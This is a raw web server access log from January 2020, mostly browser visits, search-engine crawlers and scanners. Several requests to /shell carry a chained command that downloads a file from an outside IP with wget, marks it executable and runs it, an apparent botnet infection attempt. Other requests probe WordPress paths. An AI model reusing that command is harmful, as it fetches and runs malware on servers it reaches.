151.29.227.184 - - [17/Jan/2020:07:16:21 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
93.55.255.219 - - [17/Jan/2020:07:48:43 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
87.227.140.4 - - [17/Jan/2020:09:02:49 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
5.76.39.46 - - [17/Jan/2020:10:03:08 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
124.149.191.141 - - [17/Jan/2020:10:27:59 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.173.35.13 - - [17/Jan/2020:11:28:25 +0100] "GET / HTTP/1.0" 200 41 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
34.216.73.108 - - [17/Jan/2020:12:01:00 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
18.218.117.197 - - [17/Jan/2020:12:34:02 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [17/Jan/2020:12:34:02 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [17/Jan/2020:12:34:02 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [17/Jan/2020:12:34:03 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [17/Jan/2020:12:34:03 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [17/Jan/2020:12:34:04 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [17/Jan/2020:12:34:04 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [17/Jan/2020:12:34:05 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [17/Jan/2020:12:34:05 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [17/Jan/2020:12:34:06 +0100] "" 400 0 "-" "-"
54.36.148.201 - - [17/Jan/2020:13:53:04 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
54.36.148.65 - - [17/Jan/2020:13:53:05 +0100] "GET /197-trop-heureux HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
139.162.119.197 - - [17/Jan/2020:13:54:09 +0100] "GET / HTTP/1.1" 200 41 "-" "HTTP Banner Detection (https://security.ipip.net)"
102.157.233.171 - - [17/Jan/2020:14:00:46 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
102.157.233.171 - - [17/Jan/2020:14:00:47 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
41.79.225.122 - - [17/Jan/2020:14:31:50 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
80.245.175.69 - - [17/Jan/2020:14:40:34 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
189.126.195.138 - - [17/Jan/2020:14:48:35 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
54.36.150.28 - - [17/Jan/2020:15:03:04 +0100] "GET /component/users/?view=reset HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
87.107.56.146 - - [17/Jan/2020:16:11:37 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
74.63.227.26 - - [17/Jan/2020:16:59:36 +0100] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
213.180.203.21 - - [17/Jan/2020:17:26:50 +0100] "GET /robots.txt HTTP/1.1" 404 162 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
213.180.203.21 - - [17/Jan/2020:17:26:54 +0100] "GET /favicon.ico HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
78.187.93.71 - - [17/Jan/2020:18:40:23 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
66.249.73.47 - - [17/Jan/2020:18:41:51 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.45 - - [17/Jan/2020:18:41:51 +0100] "GET /ads.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.231.68.152 - - [17/Jan/2020:19:26:27 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
103.102.73.75 - - [17/Jan/2020:19:43:39 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.216.140.6 - - [17/Jan/2020:19:48:49 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 zgrab/0.x"
80.4.126.12 - - [17/Jan/2020:20:23:03 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
92.184.116.252 - - [17/Jan/2020:20:25:55 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
92.184.116.252 - - [17/Jan/2020:20:25:55 +0100] "GET /favicon.ico HTTP/1.1" 404 193 "http://cfpt.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
92.184.116.252 - - [17/Jan/2020:20:25:57 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
92.184.116.252 - - [17/Jan/2020:20:25:57 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
92.184.116.252 - - [17/Jan/2020:20:25:57 +0100] "GET /favicon.ico HTTP/1.1" 404 193 "http://cfpt.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
92.184.116.252 - - [17/Jan/2020:20:25:57 +0100] "GET /favicon.ico HTTP/1.1" 404 193 "http://cfpt.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.130.53.67 - - [17/Jan/2020:20:50:19 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
110.5.101.246 - - [17/Jan/2020:20:57:16 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
178.122.197.186 - - [17/Jan/2020:21:26:11 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36"
190.22.214.94 - - [17/Jan/2020:22:25:47 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
51.68.225.51 - - [17/Jan/2020:22:46:50 +0100] "GET / HTTP/1.0" 200 41 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
39.108.68.243 - - [17/Jan/2020:22:59:58 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
95.76.34.140 - - [17/Jan/2020:23:06:49 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
201.6.105.246 - - [17/Jan/2020:23:39:24 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
181.112.46.26 - - [18/Jan/2020:00:19:04 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
54.36.150.124 - - [18/Jan/2020:00:39:02 +0100] "GET /123-ray-ban-et-oakley-seront-aussi-des-google-glass HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
87.19.98.81 - - [18/Jan/2020:00:50:21 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
45.143.220.99 - - [18/Jan/2020:00:58:02 +0100] "GET / HTTP/1.1" 200 41 "-" "-"
85.204.246.193 - - [18/Jan/2020:01:03:49 +0100] "GET / HTTP/1.1" 200 65 "-" "python-requests/2.22.0"
159.192.246.38 - - [18/Jan/2020:01:27:12 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
151.53.204.189 - - [18/Jan/2020:01:59:42 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
112.85.96.10 - - [18/Jan/2020:02:04:06 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
212.203.49.214 - - [18/Jan/2020:02:27:40 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
221.13.12.178 - - [18/Jan/2020:02:58:56 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
177.2.139.16 - - [18/Jan/2020:03:05:00 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
213.248.144.45 - - [18/Jan/2020:03:10:36 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
42.236.10.89 - - [18/Jan/2020:03:49:09 +0100] "GET / HTTP/1.1" 200 65 "http://cfpt.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
42.236.10.109 - - [18/Jan/2020:04:01:05 +0100] "GET / HTTP/1.1" 200 65 "http://www.cfpt.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
179.107.111.237 - - [18/Jan/2020:04:05:46 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 zgrab/0.x"
